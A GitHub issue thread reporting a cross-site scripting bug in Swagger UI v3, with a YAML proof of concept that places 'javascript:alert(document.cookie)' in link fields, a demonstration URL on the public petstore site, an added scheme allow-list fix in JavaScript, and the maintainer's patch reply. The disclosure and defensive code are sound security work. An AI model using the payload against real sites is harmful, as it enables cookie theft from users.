
XSS Vulnerability with Swagger UI v3 #3847

Closed
dexwiz opened this issue Oct 30, 2017 · 1 comment

Comments


dexwiz commented Oct 30, 2017

| Q | A |
| --- | --- |
| Bug or feature request? | Bug |
| Which Swagger/OpenAPI version? | 2 |
| Which Swagger-UI version? | 3.x |
| How did you install Swagger-UI? | Vendored Distribution |
| Which browser & version? | Chrome, Safari |
| Which operating system? | - |

Demonstration API definition

JavaScript can be injected into the Terms of Service link at the top of the page using javascript in the `termsOfService` field.

```yaml
swagger: "2.0"
info:
  title: "Swagger Sample App"
  description: "Please to click Terms of service"
  termsOfService: "javascript:alert(document.cookie)"
  contact:
    name: "API Support"
    url: "javascript:alert(document.cookie)"
    email: "javascript:alert(document.cookie)"
  version: "1.0.1"
```

Example

This vulnerability can be tested on the example petstore site. Upon loading, clicking the Terms of Service link will execute the malicious script.

http://petstore.swagger.io/?url=https://gist.githubusercontent.com/dileepdasari/7120f06a4bcfd56d6d7572a6dc1c6309/raw/7a5f5d548a3e68afc5122c51bcf9d33a47830819/xsstest.json
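The defensive check this report calls for is a scheme allow-list applied before any URL taken from an API definition becomes a link target. The following is an added example in JavaScript, not code from the original issue or from the Swagger UI project; the function names `safeHref` and `infoLinks`, the placeholder base URL and the sample `info` object are assumptions constructed for the example. It runs the WHATWG URL parser (the global `URL` in browsers and Node) over each candidate so that leading whitespace, embedded tabs or newlines and mixed-case scheme names are normalised before the scheme is compared.

```javascript
// Added example (not Swagger UI's own code): allow-list the URL scheme of
// user-controlled link targets before rendering them as <a href>.

const SAFE_SCHEMES = new Set(['http:', 'https:', 'mailto:']);

// Placeholder base (assumption) so that relative targets such as "/terms"
// parse; absolute URLs ignore the base. ".invalid" is a reserved TLD.
const RELATIVE_BASE = 'https://placeholder.invalid/';

// Returns the original string when its scheme is allow-listed, otherwise null.
// The URL parser strips C0 controls/spaces at the ends and ASCII tab/newline
// anywhere, and lowercases the scheme, so "  Java\tScript:..." is still caught.
function safeHref(candidate) {
  if (typeof candidate !== 'string' || candidate.trim() === '') return null;
  let parsed;
  try {
    parsed = new URL(candidate, RELATIVE_BASE);
  } catch (_err) {
    return null; // unparseable input is not rendered as a link
  }
  return SAFE_SCHEMES.has(parsed.protocol) ? candidate : null;
}

// Conservative shape check for an address that will be placed after "mailto:".
// Rejecting ":" and "/" keeps the composed URL a plain mailto target.
const EMAIL_SHAPE = /^[^\s@:/]+@[^\s@:/]+$/;

function safeMailto(email) {
  if (typeof email !== 'string' || !EMAIL_SHAPE.test(email)) return null;
  return safeHref('mailto:' + email);
}

// Computes the link targets an info block would render. A field that fails
// the check comes back as null so the caller falls back to plain text.
function infoLinks(info) {
  const contact = (info && info.contact) || {};
  return {
    termsOfService: safeHref(info && info.termsOfService),
    contactUrl: safeHref(contact.url),
    contactEmail: safeMailto(contact.email),
  };
}

// Constructed sample mirroring the definition in the report above.
const maliciousInfo = {
  title: 'Swagger Sample App',
  termsOfService: 'javascript:alert(document.cookie)',
  contact: {
    name: 'API Support',
    url: 'javascript:alert(document.cookie)',
    email: 'javascript:alert(document.cookie)',
  },
};

// Constructed benign sample: every field should pass unchanged.
const benignInfo = {
  title: 'Swagger Sample App',
  termsOfService: '/terms',
  contact: {
    name: 'API Support',
    url: 'https://swagger.io/',
    email: 'support@example.com',
  },
};

console.log(infoLinks(maliciousInfo)); // all three fields null
console.log(infoLinks(benignInfo));    // all three fields kept
```

Returning the original string rather than `parsed.href` keeps relative links intact; the placeholder base is only there so the parser can assign a scheme to them. Anything outside the allow-list (`javascript:`, `data:`, `vbscript:` and so on) is dropped rather than escaped, because attribute escaping does nothing against a hostile scheme in an otherwise well-formed `href`.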

Contributor

shockey commented Oct 31, 2017

I just patched this, and will release a new version shortly.

Thanks for the report, @dexwiz! In the future, please direct security issues to security@swagger.io instead of our issue tracker, as noted in the README 😄

@shockey shockey closed this as completed Oct 31, 2017
alokmenghrajani added a commit to square/keywhiz that referenced this issue Mar 14, 2019
Swagger has a XSS
(swagger-api/swagger-ui#3847) and this is the
easiest way to fix things since we don't really care about the API docs.